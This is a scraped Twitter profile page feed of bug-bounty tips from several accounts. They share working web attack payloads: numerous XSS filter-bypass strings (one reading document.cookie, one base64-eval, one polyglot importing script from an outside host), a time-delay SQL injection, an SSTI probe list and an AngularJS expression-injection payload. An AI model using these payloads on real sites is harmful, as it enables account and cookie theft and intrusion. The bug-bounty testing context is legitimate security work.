Kawindu Wijewardhane (@k_wijewardhane) 's Twitter Profile
Kawindu Wijewardhane

@k_wijewardhane

A year spent in artificial intelligence is enough to make one believe in God. ❤

ID: 1643877033045540865

linkhttps://www.kawinduwijewardhane.com calendar_today06-04-2023 07:23:42

246 Tweet

471 Followers

12 Following

Sergey Bobrov (@black2fan) 's Twitter Profile Photo

I have published a tool based on jadx that helps analyze Java applications. github.com/BlackFan/BFScan BFScan generates HTTP requests and OpenAPI specs based on config files and class/method annotations. It also searches strings that look like URIs, paths, or secrets.

Gotcha1G (@gotcha1g) 's Twitter Profile Photo

New sql injection Payload used > '+(SELECT REPLICATE(CAST('X' AS VARCHAR(MAX)), 16500000))+' | +10 seconds delay Lower number = lower delay

New sql injection
 Payload used >  '+(SELECT REPLICATE(CAST('X' AS VARCHAR(MAX)), 16500000))+'
| +10 seconds delay
Lower number = lower delay
Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #xss on someone site. Payload; " autofocus onfocus=alert(origin) x=" Beginner Friendly #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #xss on someone site.
Payload; " autofocus onfocus=alert(origin) x="

Beginner Friendly
#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips
Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #xss someone site. Payload; --'<00%20foo="<0 name="<svq/onload=alert(origin)>"></00>--%20// #bugbounty #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #xss someone site. 

Payload; --'&lt;00%20foo="&lt;0 name="&lt;svq/onload=alert(origin)&gt;"&gt;&lt;/00&gt;--%20//
#bugbounty  #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips
Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #xss someone site. Payload: "><svg/onload=alert(5)> #bugbounty #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #xss someone site.

Payload: "&gt;&lt;svg/onload=alert(5)&gt;

#bugbounty #cybersecurity #websecurity
#infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips
VIEH Group (@viehgroup) 's Twitter Profile Photo

Reflected XSS in Chat via Markdown Bypass 🚨 🔍 Payload Used: "><a href="bing.com" onmousemove​="alert(document.cookie)">Click me</a>  "><a href="Bing.com" onmousemove​="alert('Mouse moved!')">Click me</a> 🛠 How it Works: The chat interface attempted to

Reflected XSS in Chat via Markdown Bypass 🚨

🔍 Payload Used:
"&gt;&lt;a href="bing.com" onmousemove​="alert(document.cookie)"&gt;Click me&lt;/a&gt;

 "&gt;&lt;a href="<a href="/bing/">Bing</a>.com" onmousemove​="alert('Mouse moved!')"&gt;Click me&lt;/a&gt;

🛠 How it Works:
The chat interface attempted to
Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #xss on site. Pyld; ">>>>>><script>var{haha:onerror=alert}=0;throw 1</script> How do you increase the impact or chain? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #xss on  site.  
Pyld; "&gt;&gt;&gt;&gt;&gt;&gt;&lt;script&gt;var{haha:onerror=alert}=0;throw 1&lt;/script&gt;
How do you increase the impact or chain?
#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips
Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #xss on site. Payload: <style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss> #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #bugbountytips

I found #xss on  site.
Payload: &lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/xss&gt;
#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec  #bugbountytips
Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #xss on someone site. Payload; <?<a href="><body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">"> How do you increase the impact? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #xss on someone site. 
Payload; &lt;?&lt;a href="&gt;&lt;body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))"&gt;"&gt;

How do you increase the impact?  

#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips
NaZaniin (@n0azixss) 's Twitter Profile Photo

⚠️SSTI (Server Side Template Injection) Payload List → If evaluated as 49 - the target is vulnerable: 1. {7*7} 2. {7*7} 3. {{7*7}} 4. [[7*7]] 5. ${7*7} 6. @(7*7) 7. <?=7*7?> 8. <%= 7*7 %> 9. ${= 7*7} 10. {{= 7*7}} 11. ${{7*7}} 12. #{7*7} 13. [=7*7]

KNOXSS (@kn0x55) 's Twitter Profile Photo

Use this #XSS payload and pop alert boxes EVERYWHERE! 😎👇 JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:X55.is/.source))}//\76-->

Mostafa Alrefai (@__the7th) 's Twitter Profile Photo

🧵Bug Bounty Diaries ( D2 ) Today, I found my first "Prototype Pollution" vulnerability in the wild, but it can't be a valid bug to be reported on its own, so when you find a PP, you should dig deeper to combine it with a gadget in order to build a valid report...

🧵Bug Bounty Diaries ( D2 )

Today, I found my first "Prototype Pollution" vulnerability in the wild, but it can't be a valid bug to be reported on its own, so when you find a PP, you should dig deeper to combine it with a gadget in order to build a valid report...
WOLF (@__mohammed_a_) 's Twitter Profile Photo

Simple XSS payload for AngularJS testing. Older AngularJS versions are still vulnerable to expression injection. {{$on.constructor('alert(document.domain)')()}} #BugBounty #XSS #bugbountytips #hackerone

Simple XSS payload for AngularJS testing.

Older AngularJS versions are still vulnerable to expression injection.

{{$on.constructor('alert(document.domain)')()}}

#BugBounty #XSS #bugbountytips #hackerone